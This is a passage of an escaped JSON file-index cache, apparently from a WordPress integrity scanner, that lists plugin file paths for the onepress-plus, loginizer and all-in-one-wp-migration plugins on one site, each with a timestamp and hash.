5,\"h\":\"8f1d9851ebc4c2ffb93f3456b4e9f3d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/onepress-plus.css\":{\"d\":1545792805,\"h\":\"3422ce16f3c20b6f47e87516ddac6a0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/readme.txt\":{\"d\":1545792805,\"h\":\"8398e9e911b6f2337db3295419fc36c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/IPv6\\/BigInteger.php\":{\"d\":1545638103,\"h\":\"9f32ffddcafac7b87704b421f2e1d8c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/IPv6\\/IPv6.php\":{\"d\":1545638103,\"h\":\"2b4ac90b6164711f8d0c95ab51e2945a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/jquery-paginate.js\":{\"d\":1545638103,\"h\":\"09af798f92315a968fd6cf5301a2df2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/init.php\":{\"d\":1545638103,\"h\":\"8a6df63e3ef2d14377598457cd2119b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/license.txt\":{\"d\":1545638103,\"h\":\"df99819e528e6862029b344b8c65931f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/functions.php\":{\"d\":1545638103,\"h\":\"db8f356c820ab0ff6a73b3c7750414e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/index.php\":{\"d\":1545638103,\"h\":\"bbc515a2dcc278e385935be5a10a7217\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/loginizer.php\":{\"d\":1545638103,\"h\":\"4f6c76fbddc69f6c1d6f5ed6af0ebfee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/loginizer\\/readme.txt\":{\"d\":1545638103,\"h\":\"f3c4581bb52ef0a788a5c7f0bd7cc482\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/storage\\/index.php\":{\"d\":1545638100,\"h\":\"7dc6dad897b701b3d3dc016b6c648dfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/font\\/servmask.woff\":{\"d\":1545638083,\"h\":\"4b9a99bb6e1a6760181e9a251ec476cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/font\\/servmask.ttf\":{\"d\":1545638083,\"h\":\"e20dcf82749ca08c570d148f3ffc0a33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/font\\/servmask.eot\":{\"d\":1545638083,\"h\":\"841a43d91e65fc51f298ea81651ad8e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/backups.min.rtl.css\":{\"d\":1545638083,\"h\":\"7f306e137a6618564d7c8cb4e162593a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/servmask.min.css\":{\"d\":1545638083,\"h\":\"03d30a9f34dcbb8600e61b02863493ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/import.min.css\":{\"d\":1545638083,\"h\":\"64206e9aeb061015b64cb0c3ba253a03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/backups.min.css\":{\"d\":1545638083,\"h\":\"fcd4d8f94dd6b9b6e43c8d7774dec6ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/export.min.css\":{\"d\":1545638083,\"h\":\"bb378afab9e8652ed14c0835fc94089a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/updater.min.css\":{\"d\":1545638083,\"h\":\"e5e33d2a8a26eb87b76a2a66192f3682\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/export.min.rtl.css\":{\"d\":1545638083,\"h\":\"369becb49106d06de4d622d09be7da8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/import.min.rtl.css\":{\"d\":1545638083,\"h\":\"aa8c49895370c38225500636c2e04b13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/servmask.min.rtl.css\":{\"d\":1545638083,\"h\":\"e01e9c4599e6893bebc4b2be517a166e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/css\\/updater.min.rtl.css\":{\"d\":1545638083,\"h\":\"a43f70cad93e351fb245d20f48324810\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/settings.min.js\":{\"d\":1545638083,\"h\":\"aa3b79631295dbce147cac3717966c8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/export.min.js\":{\"d\":1545638083,\"h\":\"d31325da92d6b604af4d18aed4a090b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/feedback.min.js\":{\"d\":1545638083,\"h\":\"b275491ec526d3c47320a2213718e0bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/backups.min.js\":{\"d\":1545638083,\"h\":\"7730610d2a9c6f0e0fcf9baad2b6920e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/util.min.js\":{\"d\":1545638083,\"h\":\"9ab9436fd7af58b71c22f58a4985b7a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/updater.min.js\":{\"d\":1545638083,\"h\":\"e1ceb0ba601cf3d8429dafa95cf9bf98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/import.min.js\":{\"d\":1545638083,\"h\":\"2f641bcc3fa6b672c1298fe5a1058eb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/assets\\/javascript\\/report.min.js\":{\"d\":1545638083,\"h\":\"7d34f856316a345a8c684341be0e8683\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/common\\/http-authentication.php\":{\"d\":1545638083,\"h\":\"9a9017cf2d0b46db58dd0bd368d08686\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/common\\/share-buttons.php\":{\"d\":1545638083,\"h\":\"0fe54f52ec819a2b98060e5fbd302f29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/common\\/report-problem.php\":{\"d\":1545638083,\"h\":\"0f2baf640992ec8e983b220c7bc05a3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/common\\/leave-feedback.php\":{\"d\":1545638083,\"h\":\"8b6ada1b3fde9edb765c35a4721ae068\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/common\\/maintenance-mode.php\":{\"d\":1545638083,\"h\":\"9a9017cf2d0b46db58dd0bd368d08686\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/wordpress-htaccess-notice.php\":{\"d\":1545638083,\"h\":\"9e1e706e8d72aa8a438ac5c60b7291cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/backups-index-notice.php\":{\"d\":1545638083,\"h\":\"06caf3d6bd52beac9b7a2b2377fbac38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/backups-webconfig-notice.php\":{\"d\":1545638083,\"h\":\"a017ee62ca906e94c47cc8dac331cca0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/backups-htaccess-notice.php\":{\"d\":1545638083,\"h\":\"3e26e0d91a661233ce5296b772648842\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/multisite-notice.php\":{\"d\":1545638083,\"h\":\"1f183d4e9884a0f7f6d15806275b812b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/storage-index-notice.php\":{\"d\":1545638083,\"h\":\"9061205ffa444dee09132e92780841e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/admin-head.php\":{\"d\":1545638083,\"h\":\"f1dd8d2950d9c2fa22c72ddfab66babd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/storage-path-notice.php\":{\"d\":1545638083,\"h\":\"279538a2e4b57840ddad9c979e5d4c3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/get-support.php\":{\"d\":1545638083,\"h\":\"30395db1dd04dc578d21a5b6f0d42a8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/main\\/backups-path-notice.php\":{\"d\":1545638083,\"h\":\"f30394cb5c81501b033ce7694c4aa976\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/backups\\/index.php\":{\"d\":1545638083,\"h\":\"dc8b9c6999c0f5834042d9a30e6360ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-dropbox.php\":{\"d\":1545638083,\"h\":\"15fa015b99db4c4c75376a6e68a7c657\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-azure-storage.php\":{\"d\":1545638083,\"h\":\"02091df638e7f888f94f7e754ba3a739\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-s3-client.php\":{\"d\":1545638083,\"h\":\"24315e45c646e1e0af528de074ff4e8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-pcloud.php\":{\"d\":1545638083,\"h\":\"3f64dd685f3cdabe47f95bb2f32309e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-webdav.php\":{\"d\":1545638083,\"h\":\"a9468ae4589d215aa37f516936b1a959\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-gcloud-storage.php\":{\"d\":1545638083,\"h\":\"50a705b923a1438071dfb92f3de450b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-mega.php\":{\"d\":1545638083,\"h\":\"3447a3f3e49277d2858179b085aa85c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-onedrive.php\":{\"d\":1545638083,\"h\":\"a19a77ce67fcbe9d59db6153f398fc62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-ftp.php\":{\"d\":1545638083,\"h\":\"8aec58f31d202db889acf3d430e06e0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-s3.php\":{\"d\":1545638083,\"h\":\"c31220a926f6de92fa248957dedcfd43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/index.php\":{\"d\":1545638083,\"h\":\"38da98f7be9007973601617503150e9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-url.php\":{\"d\":1545638083,\"h\":\"fefc069cc912e335d38a12c350962d79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-glacier.php\":{\"d\":1545638083,\"h\":\"585749a40fc137a80f20c2a2e80c3b54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-b2.php\":{\"d\":1545638083,\"h\":\"56ddcbefff214c9ee3afb3440933c374\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-file.php\":{\"d\":1545638083,\"h\":\"3de7bf2e15c11b28a32847a29ed19d07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/pro.php\":{\"d\":1545638083,\"h\":\"59234d5f14309da5bf10f8f86b04a608\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-gdrive.php\":{\"d\":1545638083,\"h\":\"a17f7361023b4fa454c5fd92f950fbd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/import-buttons.php\":{\"d\":1545638083,\"h\":\"dd304b2038800b585fc9a488f29e2eca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-box.php\":{\"d\":1545638083,\"h\":\"0549d73d13d9cf70db00ce233484b67c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/import\\/button-digitalocean.php\":{\"d\":1545638083,\"h\":\"ad9af8f434014282d3171c078b369678\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-dropbox.php\":{\"d\":1545638083,\"h\":\"15fa015b99db4c4c75376a6e68a7c657\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-azure-storage.php\":{\"d\":1545638083,\"h\":\"02091df638e7f888f94f7e754ba3a739\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/export-buttons.php\":{\"d\":1545638083,\"h\":\"22dd694ce573726fa78ce210dc713621\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/help-section.php\":{\"d\":1545638083,\"h\":\"1959c016f2965fd91f678693d6c4708c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-s3-client.php\":{\"d\":1545638083,\"h\":\"24315e45c646e1e0af528de074ff4e8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-pcloud.php\":{\"d\":1545638083,\"h\":\"3f64dd685f3cdabe47f95bb2f32309e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-webdav.php\":{\"d\":1545638083,\"h\":\"a9468ae4589d215aa37f516936b1a959\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/find-replace.php\":{\"d\":1545638083,\"h\":\"9ae41ea88318d323eb004000941ef2ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/advanced-settings.php\":{\"d\":1545638083,\"h\":\"fa2b97db810643f436698d879129c9ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-gcloud-storage.php\":{\"d\":1545638083,\"h\":\"50a705b923a1438071dfb92f3de450b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-mega.php\":{\"d\":1545638083,\"h\":\"3447a3f3e49277d2858179b085aa85c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-onedrive.php\":{\"d\":1545638083,\"h\":\"a19a77ce67fcbe9d59db6153f398fc62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-ftp.php\":{\"d\":1545638083,\"h\":\"8aec58f31d202db889acf3d430e06e0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-s3.php\":{\"d\":1545638083,\"h\":\"c31220a926f6de92fa248957dedcfd43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/index.php\":{\"d\":1545638083,\"h\":\"e07bc7dade3f540de14ad28a80a5f25d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-glacier.php\":{\"d\":1545638083,\"h\":\"585749a40fc137a80f20c2a2e80c3b54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-b2.php\":{\"d\":1545638083,\"h\":\"56ddcbefff214c9ee3afb3440933c374\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-file.php\":{\"d\":1545638083,\"h\":\"6951bca0df2e01fec634ca18e30d9a7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-gdrive.php\":{\"d\":1545638083,\"h\":\"a17f7361023b4fa454c5fd92f950fbd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-box.php\":{\"d\":1545638083,\"h\":\"0549d73d13d9cf70db00ce233484b67c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/export\\/button-digitalocean.php\":{\"d\":1545638083,\"h\":\"ad9af8f434014282d3171c078b369678\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/updater\\/check.php\":{\"d\":1545638083,\"h\":\"2a84043e6587fdef0604e418d73aebcd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/view\\/updater\\/modal.php\":{\"d\":1545638083,\"h\":\"ab998cf5779476ebc25db3c11adc02d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/bandar\\/bandar\\/lib\\/Exceptions\\/TemplateDoesNotExistException.php\":{\"d\":1545638083,\"h\":\"1074ca2120e61a179b98588ec01edc2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/bandar\\/bandar\\/lib\\/Bandar.php\":{\"d\":1545638083,\"h\":\"76444c613bae48e354cb5ec2e1abe576\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/bandar\\/bandar\\/LICENSE\":{\"d\":1545638083,\"h\":\"0ac1546255c53bfd21c1e13e7d8ebfc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/math\\/BigInteger.php\":{\"d\":1545638083,\"h\":\"effff26845966239933ce7e26debf6ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/database\\/class-ai1wm-database.php\":{\"d\":1545638083,\"h\":\"2ff864cb8a0abd7543dab99686db2499\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/database\\/class-ai1wm-database-mysqli.php\":{\"d\":1545638083,\"h\":\"5f5f5a570cf7e3e4cd5654931a7fcd4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/database\\/class-ai1wm-database-utility.php\":{\"d\":1545638083,\"h\":\"9a1046f18c297f2e38c5da4e112952d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/database\\/class-ai1wm-database-mysql.php\":{\"d\":1545638083,\"h\":\"454745c68ab451e110daa6995e638d51\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/command\\/class-ai1wm-wp-cli-command.php\":{\"d\":1545638083,\"h\":\"6950edac0e6c750bebd7ca6e69976150\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filter\\/class-ai1wm-recursive-exclude-filter.php\":{\"d\":1545638083,\"h\":\"a3feda9cd1029a49c1d1cc6aa4cb5bda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filter\\/class-ai1wm-recursive-extension-filter.php\":{\"d\":1545638083,\"h\":\"5a89fe06cb5216cbc317cad07b1f0f72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/iterator\\/class-ai1wm-recursive-directory-iterator.php\":{\"d\":1545638083,\"h\":\"cff36e5e05654e926706559e209b9ae2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/iterator\\/class-ai1wm-recursive-iterator-iterator.php\":{\"d\":1545638083,\"h\":\"acc05768b35769495114ff1452f160c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/cron\\/class-ai1wm-cron.php\":{\"d\":1545638083,\"h\":\"83282f10e5230b5e20611c48884a29ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-index.php\":{\"d\":1545638083,\"h\":\"92570d0c7cf2f53b4969664f5b07c4c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file.php\":{\"d\":1545638083,\"h\":\"3084b882a07239a3802971a4391c1935\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-directory.php\":{\"d\":1545638083,\"h\":\"91a325fc2e24575f6ec23e399bfea8a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-webconfig.php\":{\"d\":1545638083,\"h\":\"7f6067be30cf3062d361d7fdab807531\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-htaccess.php\":{\"d\":1545638083,\"h\":\"a2a07a27854ec8f2de5daf925d2cb964\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/archiver\\/class-ai1wm-compressor.php\":{\"d\":1545638083,\"h\":\"d72f38fbdcbe1298cd6ad442466d124b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/archiver\\/class-ai1wm-archiver.php\":{\"d\":1545638083,\"h\":\"4c0890927bd1eaf175039016cdd96315\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/archiver\\/class-ai1wm-extractor.php\":{\"d\":1545638083,\"h\":\"d7291d3671db068238f5c2b09e2302da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-updater-controller.php\":{\"d\":1545638083,\"h\":\"036264c2452dade0c461faea34126c57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-status-controller.php\":{\"d\":1545638083,\"h\":\"66db2f5314db1d9d6c1f83276a318d28\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-backups-controller.php\":{\"d\":1545638083,\"h\":\"6e889db6cfc28391e10e895c2a64a541\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-import-controller.php\":{\"d\":1545638083,\"h\":\"ac68bce0ab42ca86d72f94c3c9223f50\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/